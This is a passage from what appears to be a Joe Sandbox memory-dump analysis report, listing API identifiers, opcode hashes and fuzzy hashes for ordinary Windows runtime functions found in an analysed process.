                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$QueryVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3696288210-0
                                                                                                                                                                        • Opcode ID: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                                                                                                                                        • Instruction ID: f85ef0f291588ccaa54987cf1962206befa4a3bb096067e95ee25e35f72a66cb
                                                                                                                                                                        • Opcode Fuzzy Hash: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                                                                                                                                        • Instruction Fuzzy Hash: 8821C06161EE4581EB608B19E44062D67A4FB987E4F600335EAAD837F4FF3CE550DB40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $
                                                                                                                                                                        • API String ID: 0-227171996
                                                                                                                                                                        • Opcode ID: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                                                                                                                                        • Instruction ID: a5e36c477c0874608e553ff2bb0a9472b2898ecbf2a16284b35571f143570022
                                                                                                                                                                        • Opcode Fuzzy Hash: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                                                                                                                                        • Instruction Fuzzy Hash: B202D026619B8585DB708B19D48076EB7A0F7C9BB4F504722EABD877E5EE3CE4408B40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID: \
                                                                                                                                                                        • API String ID: 1452528299-2967466578
                                                                                                                                                                        • Opcode ID: 888c02a4af715df60f1a7dd258da0cc1fa8a9f94b01bbf0f875320e646443852
                                                                                                                                                                        • Instruction ID: 79dd73cb0ffd90cd1062c7095854f82a7d250a4035e6fb3834d602c1a49df6d0
                                                                                                                                                                        • Opcode Fuzzy Hash: 888c02a4af715df60f1a7dd258da0cc1fa8a9f94b01bbf0f875320e646443852
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D51EC32A19B8587DB50DB19E484629B7F0F789BA5F100235EAAD877E8EF3CD441CB04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                        • Opcode ID: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                                                                                                                                        • Instruction ID: af88eaae56ebb20a808d5e2fa46fdbd4d349826d280dfdf11c49a0c231b30de8
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                                                                                                                                        • Instruction Fuzzy Hash: 63E04820F0430542EB145B75989537D3A72AFE5741F14943AE86F833DAED3DE4688311
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1225938287-0
                                                                                                                                                                        • Opcode ID: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                                                                                                                                        • Instruction ID: e24120b3956eeca91131f5c7e16191c21635d9ebaff2f640cf595a924c26133c
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                                                                                                                                        • Instruction Fuzzy Hash: 83F01D71629B8182D7209B58E44471A7B71F7887B4F500325E6BE42BE8DF3CD154CB04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1225938287-0
                                                                                                                                                                        • Opcode ID: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                                                                                                                                        • Instruction ID: c7ecf4391947c18796ca4222728d88431a9f541d734e6f248f8d0597e5a31d05
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                                                                                                                                        • Instruction Fuzzy Hash: A1F01D71629B8186D7209B18E44471ABB71F7887B4F500325F6BE42BE8DF7CD154CB04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-3916222277
                                                                                                                                                                        • Opcode ID: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                                                                                                                                        • Instruction ID: 1216a1dacf10a6243ea0b892b72178d8b53d057f40daf4a4bd321ab12dd3c603
                                                                                                                                                                        • Opcode Fuzzy Hash: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                                                                                                                                        • Instruction Fuzzy Hash: EC51BA3661968586DB50CB19E08072EB7B0F7C9B94F505126FB9E87BA8EF3DD4418F40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsupr_s
                                                                                                                                                                        • String ID: arg
                                                                                                                                                                        • API String ID: 600324503-2022414218
                                                                                                                                                                        • Opcode ID: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                                                                                                                                        • Instruction ID: 00611b877f3c67a4b2cec0059f3e6572b70c3016ef93905061a9fa388643ac21
                                                                                                                                                                        • Opcode Fuzzy Hash: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D313D3160964186D720EB29E44166A73A1FBC97A4F504231FAADC77E9FF3CE9018F40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: try_get_function
                                                                                                                                                                        • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                                                        • API String ID: 2742660187-2031265017
                                                                                                                                                                        • Opcode ID: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                                                                                                                                        • Instruction ID: c036be58192047c933e59a26f5bfae2a90169891320936301acf70ab64c76461
                                                                                                                                                                        • Opcode Fuzzy Hash: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                                                                                                                                        • Instruction Fuzzy Hash: A8E04F92F0860AA1FF0447E9E8811B41621AFF8770E884331F93C8A3E0AE2C99A5C350
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                                                                                                                                        • Instruction ID: 260f25653a9f71b1d7b352f15105ecffe3179d42bc16da550b397c066d68e960
                                                                                                                                                                        • Opcode Fuzzy Hash: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D51D621B0924A85F7689E26980167E6E91FFE4BB4F444230FD7C877DDEE3CE4618A04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6FE0AD50B,?,?,00000000,00007FF6FE0AD5B3,?,?,?,?,?,?,00007FF6FE09AF6A), ref: 00007FF6FE0AD63E
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6FE0AD50B,?,?,00000000,00007FF6FE0AD5B3,?,?,?,?,?,?,00007FF6FE09AF6A), ref: 00007FF6FE0AD648
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1687624791-0
                                                                                                                                                                        • Opcode ID: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                                                                                                                                        • Instruction ID: bfecb26525c51aa14bc7e99a15110adf160fe0ea80c242a717ff1e22e7d638ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                                                                                                                                        • Instruction Fuzzy Hash: BA118411F0964701EF945774D49037D2E92AFE4BA8F180335FA3EC72D6EE6CA4648600
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3548387204-0
                                                                                                                                                                        • Opcode ID: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                                                                                                                                        • Instruction ID: c436e945a590a47500e27cd26212d84c0b81e6c7206e1d8d7475a3d080f8007f
                                                                                                                                                                        • Opcode Fuzzy Hash: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B116654E5810B42FB5477B094562BC1E919FF2B50F440634F57DEA2C3FD1CB8A58222
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                        • Opcode ID: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                                                                                                                                        • Instruction ID: 07bd784016d6a77c7c1538441b598ab60570ce5fa9e0bc450648b74a25aa8faf
                                                                                                                                                                        • Opcode Fuzzy Hash: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                                                                                                                                        • Instruction Fuzzy Hash: 6511A832A08B4586DB208B59E4843297BB4F7E8758F544231E6AE836E4EF3DD565CB04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                        • Opcode ID: 85b01fc9dd2385e696d620e118b477d8565d40a877a840c79710b35754001cda
                                                                                                                                                                        • Instruction ID: a64ea66f7feb74a8abc3f5145b5ca68f283ca0f759fb3ab92c3523466dc69ae0
                                                                                                                                                                        • Opcode Fuzzy Hash: 85b01fc9dd2385e696d620e118b477d8565d40a877a840c79710b35754001cda
                                                                                                                                                                        • Instruction Fuzzy Hash: 2071FB36619B8586CB60DB19E49076EB7A0F7C8BA4F104125EA9DC7BA8EE38D451CB00
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2882679554-0
                                                                                                                                                                        • Opcode ID: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                                                                                                                                        • Instruction ID: fe1bf42dbbee3002bcdba78e6f981232ec5d5e369026a2efacfdf47a620109ec
                                                                                                                                                                        • Opcode Fuzzy Hash: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                                                                                                                                        • Instruction Fuzzy Hash: AE51BB76618B4982DB60DF1AE49012E7BB1F7D9B94F101232EB9D87BA8DF3CD4518B04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-0
                                                                                                                                                                        • Opcode ID: 89b1068a0023759cda3ceb920f6e8c1857f0eae96593cfe7be954dcf565d8c29
                                                                                                                                                                        • Instruction ID: 150ea7fdc55fdb182282313052b3a894e30985dc82eb10c9843b266f61f70688
                                                                                                                                                                        • Opcode Fuzzy Hash: 89b1068a0023759cda3ceb920f6e8c1857f0eae96593cfe7be954dcf565d8c29
                                                                                                                                                                        • Instruction Fuzzy Hash: 6051CB36619B8886DB60CB4AE49031EBBA0F7C8B94F144225EADD47BA8DF7DD544CF40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                                                                                                                                        • Instruction ID: e7a11c2123221a590903fe2e8d4cb2b61375c0e01a38e5cf401e626242554677
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                                                                                                                                        • Instruction Fuzzy Hash: DD318F32A1865A85E7016F65CC4137C3EA1AFE4BA0F510235F93D833D6EF7CA4A28712
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
